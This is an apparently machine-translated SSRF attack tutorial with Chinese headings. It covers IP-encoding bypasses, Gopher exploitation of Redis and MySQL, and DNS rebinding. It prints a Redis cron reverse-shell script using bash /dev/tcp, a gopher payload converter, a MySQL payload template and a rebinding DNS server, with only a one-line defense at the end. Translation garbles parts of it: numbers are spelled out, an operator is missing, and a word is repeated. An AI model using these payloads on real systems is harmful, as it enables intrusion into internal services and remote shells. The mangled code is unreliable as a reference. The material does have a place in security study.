SSRF 漏洞相关

1 定义与原理

1.1 定义

SSRF (Server-Side Request Forgery), a security vulnerability that constructs requests by an attacker and initiates requests by the server. Generally speaking, the target of an SSRF attack is an internal system that cannot be accessed from an external network.

The reason for the formation of SSRF is mostly because the server provides the function of obtaining data from other server applications and does not filter or restrict the target address. For example, obtain the web page text content from the specified URL address, load the pictures of the specified address, download, etc.

1.2 特点

The attacker cannot directly access the service of the target machine 2

Target Machine 1 has access to the services of Target Machine 2

Target Machine 1 exposes the way to access Target Machine 2, which can be exploited by the attacker

1.3 检测方法

Because the SSRF vulnerability is a security vulnerability that allows the server to send requests, it can be used to analyze whether the sent request was sent by the server to determine whether the SSRF vulnerability exists.

Find the accessed resource address in the page source code. If the resource address type is www.baidu.com/xxx.php?image=(address) there may be an SSRF vulnerability.

1.4 PHP 中的相关函数

file_get_contents()

fsocckopen()

curl_exec()

1.4 危害

You can scan the ports of the external network, the intranet where the server is located, and the local area to obtain the banner information of some services.

Attack applications running on the intranet or local (such as overflow)

Fingerprinting of intranet web applications, and implement it by accessing default files

Attacking web applications on the internal and external networks mainly involves attacks that can be achieved using get parameters (such as Struts2 vulnerability exploitation, SQL injection, etc.)

Read local files using the File protocol

2 绕过方法

2.1 IP 绕过

Add port

Short URL, but by default, the CURL command is not enabled. Follow 302 jump

Domain name xip.io, 127.0.0.1.xip.io that points to any IP

IP restriction bypass

127.0.0.1

0177.0.0.1 Octal

0x7f.0.0.1 Hexadecimal

Hexadecimal delimiter http://0x7F000001

Remove the separator in decimal http://2130706433

2.2 其它 Tips

Combined with dict://file://gopher://

http://[email protected]

Use the www.baidu.com username to detect whether you have permission to access the website of 192.168.0.1

Short connection (301 jump, you need to be able to access the external network)

2.3 Gopher 协议

gopher is a distributed file collection and acquisition network protocol used on the Internet

The gopher protocol supports issuing GET and POST requests: you can first intercept the get request package and the post request package, and then construct the request that complies with the gopher protocol. The gopher protocol is one of the most powerful protocols (commonly known as the universal protocol) in SSLF utilization.

2.3.1 Gopher 控制 Redis 反弹 shell

premise

redis not authorized

redis has write permission to cron

通过 socat 抓流量Script:

1

2

3

4

echo -e '\n\n*/1 * * * * bash -i /dev/tcp/ip/port 0 1\n\n'|redis-cli -h $1 -p $2 -x set 1

redis-cli -h $1 -p $2 config set dir /var/spool/cron

redis-cli -h $1 -p $2 config set dbfilename root

redis-cli -h $1 -p $2 quit

Execution:/shell.sh 127.0.0.1 4444

流量转发1

socat -v tcp-listen:4444,fork tcp-connect:IP:6379

Traffic conversion

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

# coding: utf-8

import sys

exp=''

with open(sys.argv[1]) as f:

for line in f.readlines():

if line[0] in '+':

Continue continue

# Determine whether the 2nd and 3rd last string is \r

elif line[-3:-1]==r'\r':

# If the line has only \r, replace \r with %0a%0d%0a

if len(line)==3:

exp=exp + '%0a%0d%0a'

else:

line=line.replace(r'\r', '%0d%0a')

# Remove the last line break

line=line.replace('\n', '')

exp=exp + line

# Determine whether it is a blank line, replace the blank line with %0a

elif line=='\x0a':

exp=exp + '%0a'

else:

line=line.replace('\n', '')

exp=exp + line

print exp

2.3.2 Gopher 对 Mysql 的利用

Prerequisite:

SSRF vulnerability exists

MySQL No password

Gopher protocol conversion

1

2

3

4

5

6

gopher://127.0.0.1:3306/_

+ url encoded login request

+ Packet Length (Wireshark can directly see Packet Length when catching packets)

+ %00%00%00%03

+ Query statement (URL encoding)

+ %01%00%00%00%01

2.3.3 相关工具

https://github.com/tarunkant/Gopherus

2.4 DNS 重绑定攻击

2.4.1 原理

The process of general web application defense SSRF is as follows:

Get the input URL and extract the host from the URL

Perform DNS resolution on the host and obtain the resolved IP

Detect whether the IP is legal, such as whether it is a private IP, etc.

If the IP is detected as legal, then the packet is entered in the curl stage

It was observed that in this process, DNS resolution was performed in total: the first was to perform DNS resolution on the host of the URL, and the second was to perform resolution when using curl to send packets. There is a time difference between these two DNS resolutions, and we can use this time difference to bypass it.

The mechanism in DNS corresponding to the time difference is TTL. TTL represents the longest time that the cache of the domain name and IP binding relationship in DNS survives on DNS. That is, after requesting the relationship between the domain name and the IP, the requesting party will cache the relationship, and the cache is maintained at TTL. The cache will be deleted after it expires. At this time, if you revisit the IP specified by the domain name, the matching relationship and cache will be re-established.

In the above process, if we can change the IP corresponding to the URL during the second DNS resolution, then if we revisit this URL after TTL and after the cache expires, we can obtain the replaced IP. If we set the IP resolved for the first time as a legal IP, we can bypass the host legality check; if we set the IP resolved for the second time as an intranet IP, we can achieve the purpose of SSRF accessing the intranet.

Summarize

The principle of DNS rebinding attack is: use the short gap between the server resolving the same domain name twice, and replace the IP behind the domain name to achieve the purpose of breaking through the same-origin strategy or ssrf through waf.

2.4.2 实现

一些 DNS Rebinding 平台https://lock.cmpxchg8b.com/rebinder.html

https://requestrepo.com/

手动实现You need to add an NS record and an A record first:

Record Type

Host Record

Record value

NS

test

ns.geekby.xyz

A

ns

39.96.14.41

The NS record represents the domain name test.geekby.xyz This subdomain is specified to be parsed by the domain name server ns.geekby.xyz, and then the A record represents the location of the ns.geekby.xyz on the IP address 39.96.14.41.

Here, the DNS server is built using the name module in the twisted library of python, and the code is as follows:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

from twisted.internet import reactor, defer

from twisted.names import client, dns, error, server

record={}

class DynamicResolver(object):

def _doDynamicResponse(self, query):

name=query.name.name

if name not in record or record[name] 1:

ip='127.0.0.1'

else:

ip='1.2.3.4'

if name not in record:

record[name]=0

record[name]+=1

print name+'==='+ip

answer=dns.RRHeader(

name=name,

type=dns.A,

cls=dns.IN,

ttl=0,

payload=dns.Record_A(address=b'%s'%ip,ttl=0)

)

answers=[answer]

authority=[]

additional=[]

Return answers, authority, additional

def query(self, query, timeout=None):

return defer.succeed(self._doDynamicResponse(query))

def main():

factory=server.DNSServerFactory(

clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]

)

protocol=dns.DNSDatagramProtocol(controller=factory)

reactor.listenUDP(53, protocol)

reactor.run()

if __name__=='__main__':

raise SystemExit(main())

2.4.3 防御方法

Ensure that the results of the two queries are consistent by controlling the interval between the DNS query requests to be lower than the TTL value.

The default TTL for Java applications is 10s, and this default configuration will cause DNS Rebinding to fail bypass.